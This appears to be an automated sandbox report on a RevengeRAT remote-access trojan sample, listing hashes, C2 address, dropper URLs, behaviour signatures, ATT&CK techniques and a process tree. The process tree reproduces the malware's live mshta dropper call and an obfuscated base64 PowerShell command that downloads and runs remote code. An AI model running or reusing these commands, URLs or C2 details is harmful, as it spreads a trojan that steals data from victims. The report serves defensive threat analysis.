revengerat | ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7

General

Target

ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe
Size

8.0MB
MD5

45df7cac0ed5b81ab9ce28a44a60a132
SHA1

e879b5ffd2d9f79be12472395130a0b67c12e13e
SHA256

ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7
SHA512

6456c1d821031c3e090f1a6c807da61b639306ef64c6d0b233cc5770ea4a0280ebca19c9f3dbaf4b74f717a6237a2b744cfab851075ad9e5cb168fda01428086

Score

10^/10

revengerat guest stealer trojan upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.minpic.de/k/b7d6/44dea/

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.minpic.de/k/b7d4/1jepll/

Extracted

Family

revengerat

Botnet

Guest

C2

185.25.50.196:64537

Mutex

RV_MUTEX-pnFwUnoWrUUgHRH

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 2 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

8 2956 mshta.exe
10 2956 mshta.exe
14 4392 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Cvnnc.exeGrffqeoehyjfp.exe

pid process

3788 Cvnnc.exe
1688 Grffqeoehyjfp.exe

flow	pid	process
8	2956	mshta.exe
10	2956	mshta.exe
14	4392	powershell.exe

pid	process
3788	Cvnnc.exe
1688	Grffqeoehyjfp.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Grffqeoehyjfp.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Grffqeoehyjfp.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

1688 Grffqeoehyjfp.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeGrffqeoehyjfp.exe

pid process

4392 powershell.exe
4392 powershell.exe
1688 Grffqeoehyjfp.exe
1688 Grffqeoehyjfp.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

1688 Grffqeoehyjfp.exe

pid	process
4392	powershell.exe
4392	powershell.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeGrffqeoehyjfp.exe

description	pid	process
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeBackupPrivilege	1688	Grffqeoehyjfp.exe
Token: SeRestorePrivilege	1688	Grffqeoehyjfp.exe
Token: SeDebugPrivilege	1688	Grffqeoehyjfp.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

1688 Grffqeoehyjfp.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Grffqeoehyjfp.exe

pid	process
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe
1688	Grffqeoehyjfp.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exemshta.exeCvnnc.exe

description	pid	process	target process
PID 2164 wrote to memory of 2956	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	mshta.exe
PID 2164 wrote to memory of 2956	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	mshta.exe
PID 2164 wrote to memory of 2956	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	mshta.exe
PID 2956 wrote to memory of 4392	2956	mshta.exe	powershell.exe
PID 2956 wrote to memory of 4392	2956	mshta.exe	powershell.exe
PID 2956 wrote to memory of 4392	2956	mshta.exe	powershell.exe
PID 2164 wrote to memory of 3788	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	Cvnnc.exe
PID 2164 wrote to memory of 3788	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	Cvnnc.exe
PID 3788 wrote to memory of 2884	3788	Cvnnc.exe	fondue.exe
PID 3788 wrote to memory of 2884	3788	Cvnnc.exe	fondue.exe
PID 2164 wrote to memory of 1688	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	Grffqeoehyjfp.exe
PID 2164 wrote to memory of 1688	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	Grffqeoehyjfp.exe
PID 2164 wrote to memory of 1688	2164	ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe	Grffqeoehyjfp.exe

C:\Users\Admin\AppData\Local\Temp\ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe
"C:\Users\Admin\AppData\Local\Temp\ba5821b52acfddb0094f6746a88a99b3fd5152cbec21d05bac8611a0921052f7.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.minpic.de/k/b7d6/44dea/
2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy unrestricted -windowstyle hidden -enc LgAgACAAIAAgACAAIAAoACAAIAAgACAAIAAgACAAJwBzAHYAJwAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACgAIAAgACAAIAAgACAAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGUAJwAsACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIAAgACAAIAAgACAAIAAgACAAJwBrAFgAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAYQAnACAAIAAgACAAIAAgACAAIAApACwAJwAwACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAApACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAHQAeQBwAGUAXQAoACAAIAAgACAAIAAgACAAIAAgACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAE0AJwAsACgAIAAgACAAIAAgACAAIAAgACcAUABQAEQAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAJwBvACcAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAnAEEASQAnACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcAbgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAnAGEAJwAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALgAgACAAIAAgACAAIAAgACAAIAAoACAAIAAgACAAIAAgACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBlAHQALQBWAEEAcgBJAEEAJwAsACcAYgBMAGUAJwAsACcAUwAnACAAIAAgACAAIAAgACAAIAApACAAIAAoACAAIAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwA3ACcALAAnAEYAWQAnACAAIAAgACAAIAAgACAAKQAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAdABZAFAARQBdACgAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAJwBUACcALAAoACAAIAAgACAAIAAgACAAIAAgACcATgAnACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcAdgBlAHIAJwAgACAAIAAgACAAIAAgACAAKQAgACAAKQAsACcAQwBvACcAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQAwAGAASwBYAGEAfQA6ADoAIgBjAGAAVQBSAGAAUgBlAG4AVABkAG8ATQBgAEEASQBOACIALgAiAEwAbwBgAEEARAAiACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAuACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAHYAQQByAGkAYQBCAGwAZQAnACwAJwBnAEUAJwAsACcAdAAtACcAIAAgACAAIAAgACAAKQAgACAAKAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcANwAnACwAJwBmAFkAJwAgACAAIAAgACAAIAAgACAAIAAgACkAIAAgAC0AdgBBAEwAVQAgACAAIAAgACAAIAAgACkAOgA6ACgAIAAgACAAIAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMwB9AHsAMgB9AHsAMAB9ACIALQBmACgAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACAAIAAgACAAIAAgACcAaQAnACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAJwBuAGcAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAApACwAJwB0AHIAJwAgACAAIAAgACAAIAAgACkALAAnAEYAJwAsACgAIAAgACAAIAAgACAAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAG0AYgAnACwAKAAgACAAIAAgACAAJwBlACcAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcANgA0AFMAJwAgACAAIAAgACAAIAAgACkALAAnAGEAcwAnACAAIAAgACAAIAAgACAAKQAsACcAcgBvACcAIAAgACAAIAAgACAAIAAgACkALgAiAEkATgBWAGAAbwBrAGUAIgAoACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJgAgACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACgAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAtAGYAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAGIAagBlACcAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBjACcAIAAgACAAIAAgACAAIAAgACkALAAnAHQAJwAgACAAIAAgACAAIAAgACkALAAnAE4AZQAnACwAKAAgACAAIAAgACAAIAAgACAAIAAgACcAdwAnACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACcALQBPACcAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACkAIAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACAAIAAgACAAIAAnAFMAJwAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAnAHkAcwAnACAAIAAgACAAIAApACwAJwB0ACcAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAoACAAIAAgACAAIAAgACAAIAAgACAAJwBlAG0AJwAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACcALgAnACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACAAIAAgACAAIAAgACAAJwBlAG4AJwAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAJwB0ACcAIAAgACAAIAAgACAAIAAgACAAIAApACwAJwBpACcAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAoACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACAAIAAnAFcAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAZQBiACcAIAAgACAAIAAgACAAKQAsACcAQwBsACcAIAAgACAAIAAgACAAIAAgACAAKQAsACgAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAE4AZQAnACwAJwB0AC4AJwAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAKQAuACgAIAAgACAAIAAgACAAIAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAoACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBvACcALAAnAEQAbwAnACwAKAAgACAAIAAgACAAIAAgACcAdwBuACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAGwAJwAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBpACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAbgBnACcAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAByACcALAAoACAAIAAgACAAIAAgACAAJwBhACcAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAJwBkAHMAJwAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAKQAuACIAaQBuAGAAVgBvAGsAZQAiACgAIAAgACAAIAAgACAAIAAgACAAIAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBuAHAAaQBjAC4AZABlAC8AawAvAGIANwBkADQALwAxAGoAZQBwAGwAbAAvACcAIAAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAApAC4AIgBFAE4AdABgAFIAYAB5AGAAUABPAGkAbgB0ACIALgAiAEkAYABOAFYATwBLAGUAIgAoACAAIAAgACAAIAAgACQAewBOAHUAYABsAGwAfQAsACQAewBuAHUAYABsAGwAfQAgACAAIAAgACAAIAAgACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe
"C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3788

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
3⤵
PID:2884

C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe
"C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe
MD5
72ef30dcd9957849920b70bba22ba753

SHA1
6767ec9b1a8f77a9ffb9883cffe2196b94971883

SHA256
930456009ff667ff95f11653868926de83ce4a6e133a0abf0fe8b36be58e1128

SHA512
d3c542fa72034e1edccb5d3ff8e72d5db8084783aa174b780a4636f7ace075432feeef30554db3da404a45d9ad9b829ce3f6c5beb9eff385ba394ca0d23581c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe
MD5
72ef30dcd9957849920b70bba22ba753

SHA1
6767ec9b1a8f77a9ffb9883cffe2196b94971883

SHA256
930456009ff667ff95f11653868926de83ce4a6e133a0abf0fe8b36be58e1128

SHA512
d3c542fa72034e1edccb5d3ff8e72d5db8084783aa174b780a4636f7ace075432feeef30554db3da404a45d9ad9b829ce3f6c5beb9eff385ba394ca0d23581c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe
MD5
84461fc05f27723f68779c18329dfb0c

SHA1
eee78ff3d7dc01fd4091d87ee58bc08f07fa4bb1

SHA256
022b68cad3452cbafa9d735b2c1be070b10e06e38cc15800a40431f3f7954f9e

SHA512
68ed44e620469520dbbaab729a103ee2620051b7b590e30cd232bbd8feed6573ee8a4222b718d051b688dd210009118a68d277a5f9678a9f09d30adbcdc0a78a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe
MD5
84461fc05f27723f68779c18329dfb0c

SHA1
eee78ff3d7dc01fd4091d87ee58bc08f07fa4bb1

SHA256
022b68cad3452cbafa9d735b2c1be070b10e06e38cc15800a40431f3f7954f9e

SHA512
68ed44e620469520dbbaab729a103ee2620051b7b590e30cd232bbd8feed6573ee8a4222b718d051b688dd210009118a68d277a5f9678a9f09d30adbcdc0a78a

Download Submit
memory/2164-147-0x00000000167E0000-0x0000000016D84000-memory.dmp

Filesize
5.6MB

Download
memory/2164-132-0x00000000002B0000-0x0000000000AC2000-memory.dmp

Filesize
8.1MB

Download
memory/2164-133-0x00000000053E0000-0x000000000547C000-memory.dmp

Filesize
624KB

Download
memory/2164-134-0x00000000060D0000-0x00000000060D1000-memory.dmp

Filesize
4KB

Download
memory/2164-149-0x0000000005660000-0x000000000566A000-memory.dmp

Filesize
40KB

Download
memory/2164-148-0x0000000005ED0000-0x0000000005F62000-memory.dmp

Filesize
584KB

Download
memory/2164-131-0x0000000074760000-0x0000000074F10000-memory.dmp

Filesize
7.7MB

Download
memory/4392-141-0x0000000005F20000-0x0000000005F86000-memory.dmp

Filesize
408KB

Download
memory/4392-143-0x00000000065F0000-0x000000000660E000-memory.dmp

Filesize
120KB

Download
memory/4392-144-0x0000000007F20000-0x000000000859A000-memory.dmp

Filesize
6.5MB

Download
memory/4392-145-0x0000000006B20000-0x0000000006B3A000-memory.dmp

Filesize
104KB

Download
memory/4392-146-0x0000000002C95000-0x0000000002C97000-memory.dmp

Filesize
8KB

Download
memory/4392-142-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/4392-140-0x0000000005D80000-0x0000000005DA2000-memory.dmp

Filesize
136KB

Download
memory/4392-139-0x0000000002C92000-0x0000000002C93000-memory.dmp

Filesize
4KB

Download
memory/4392-138-0x0000000002C90000-0x0000000002C91000-memory.dmp

Filesize
4KB

Download
memory/4392-137-0x0000000074760000-0x0000000074F10000-memory.dmp

Filesize
7.7MB

Download
memory/4392-136-0x0000000005700000-0x0000000005D28000-memory.dmp

Filesize
6.2MB

Download
memory/4392-135-0x0000000002CE0000-0x0000000002D16000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads